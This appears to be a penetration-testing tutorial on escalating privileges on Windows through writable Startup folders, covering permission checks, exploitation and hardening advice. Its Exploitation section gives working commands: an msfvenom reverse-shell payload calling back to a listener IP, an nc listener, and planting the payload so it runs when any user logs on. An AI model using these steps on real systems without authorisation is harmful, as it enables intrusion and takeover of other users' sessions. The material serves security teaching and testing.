Startup applications privilege escalation refers to the phenomenon where certain software or applications gain elevated privileges upon system boot, allowing them to execute commands or access resources that would typically be restricted to regular users or applications. This can pose a significant security risk, as it provides an avenue for malicious actors to exploit vulnerabilities in these applications to gain unauthorized access to sensitive data or perform malicious actions on the system.

When a user logs on to the system, there are two folders where programs automatically start (execute) from called the Startup folders. The Startup folders can be found in the following locations:

  • C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

The first folder is tied to the specific user logging on and only executes for that user. The second folder however is the machine startup folder, which means that any startup applications in that folder (executables or batch scripts) will execute when ANY user logs on to the system.

Identification

1. Check the permissions on the StartUp folders, notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

  • icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Note: we are looking for on the folder are any one of the following three permissions:

  • (F) Full Control
  • (M) Modify
  • (W) Write

The user / group permissions we are looking for are the following:

  • The user we are currently logged in as (%USERNAME%)
  • Authenticated Users
  • Everyone
  • BUILTIN\Users
  • NT AUTHORITY\INTERACTIVE

2. Identify it using Sysinternals AccessChk (https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk)

  • .\accesschk64.exe -wvud "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" -accepteula

WinPEAS (https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

1. This can also be identified using WinPEAS script

  • .\winPEASx64.exe applicationsinfo

https://juggernaut-sec.com/wp-content/uploads/2022/06/image-35.png

Exploitation

1. we can utilize either an EXE or a batch script to exploit this misconfiguration, we will craft a malicious BATCH file to execute it as any user that logs on. First, we will create our payload

  • msfvenom -p windows/shell_reverse_tcp LHOST=10.9.239.141 LPORT=5555 -f exe > exploit.exe

2. Start a listener in your local machine

  • nc -lvp 5555

3. Transfer the file into the target machine

4. Place exploit.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup".

  • move .\exploit.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  • cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  • dir

5. (OPTIONAL) Assign privileges to execute to Everyone

  • Right click on exploit.exe -> Properties -> Security -> Group or user names -> Edit
  • Add -> Everyone

5. Wait for someone to log in, check out your listener

Recommendations

  • Least Privilege Principle: Follow the principle of least privilege when configuring startup applications. Only grant necessary permissions and privileges to each application, limiting the potential impact of any security breaches.
  • Application Whitelisting: Implement application whitelisting policies to restrict the execution of unauthorized or untrusted applications during the startup process. This helps prevent malicious software from gaining elevated privileges on the system.

Reference

https://steflan-security.com/windows-privilege-escalation-startup-applications/

https://juggernaut-sec.com/startup-applications/

https://www.hackingarticles.in/windows-privilege-escalation-boot-logon-autostart-execution-startup-folder/

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries

https://medium.com/@Varma_Chekuri/windows-privilege-escalation-2-f0dfb1021213

https://www.stationx.net/windows-privilege-escalation/

https://attack.mitre.org/techniques/T1547/001/